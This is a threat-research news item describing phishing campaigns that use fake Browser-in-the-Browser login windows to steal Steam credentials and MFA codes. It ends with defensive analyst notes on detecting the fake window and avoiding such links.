New Threat Research: Uncovering Adversarial LDAP Tradecraft

Read Threat Research


Hackers Steal Steam Accounts in New Browser-in-the-Browser Attacks

Threat actors are using new phishing techniques to steal credentials to the digital gaming platform Steam with the intent to sell them to other users. The phishing technique used is known as a Browser-in-the-Browser attack, a sophisticated technique involving the creation of fake browser windows within the active window.

In these campaigns, targeted users receive direct messages on Steam inviting them to join a tournament for a popular video game. This message includes a link to a website for what appears to be an organization hosting eSports competitions and requires users to log in to their Steam account to sign up. This triggers what appears to be a new browser window to open, containing the login page for Steam. This window, however, isn’t a new browser window and is instead a fake window created within the current page. The fake window is mirrored to look like the Steam login page, including the legitimate Steam URL in the address bar as well as the HTTPS secure lock, but when any credentials are entered, they are sent to the threat actor instead. These pages are sophisticated enough to be able to prompt for and steal MFA codes as well. Once the authentication process has been successful, the webpage redirects the web browser to a legitimate address in an attempt to hide the fact that credentials were just stolen.

At this point, the threat actors quickly hijack the Steam accounts, changing passwords and email addresses to make it more difficult for victims to regain access. This phishing method, using Browser-in-the-Browser attacks, is gaining in popularity among threat actors due to its sophisticated nature and users’ difficulty in determining that it is a phishing attempt.

Analyst Notes

Due to the sophisticated nature of a Browser-in-the-Browser attack, it can be hard to detect. One such way would be to block JavaScript within a web browser. Since this attack relies heavily on JavaScript, this step would prevent the pop-up window from being displayed. However, this may not be feasible for every organization, as doing this will also likely break several legitimate and popular websites. One method of manual detection for this attack is to determine if the pop-up window can be dragged out of the original browser window. Since the pop-up window is simply a part of the webpage in the original window, it cannot be physically removed from the confines of the browser window. If a particular pop-up window cannot be dragged to another screen, there is a high probability that it is a phishing attack using this technique. The best way to prevent this type of attack occurring is to recognize the phishing attempt on initial contact. It is highly recommended to not click on links provided by unknown users on Steam, Discord, or other instant messaging platforms. This also extends to email, where all links sent in emails should be heavily scrutinized before accessing them. These steps can help prevent a user from falling for a sophisticated phishing attack in the first place.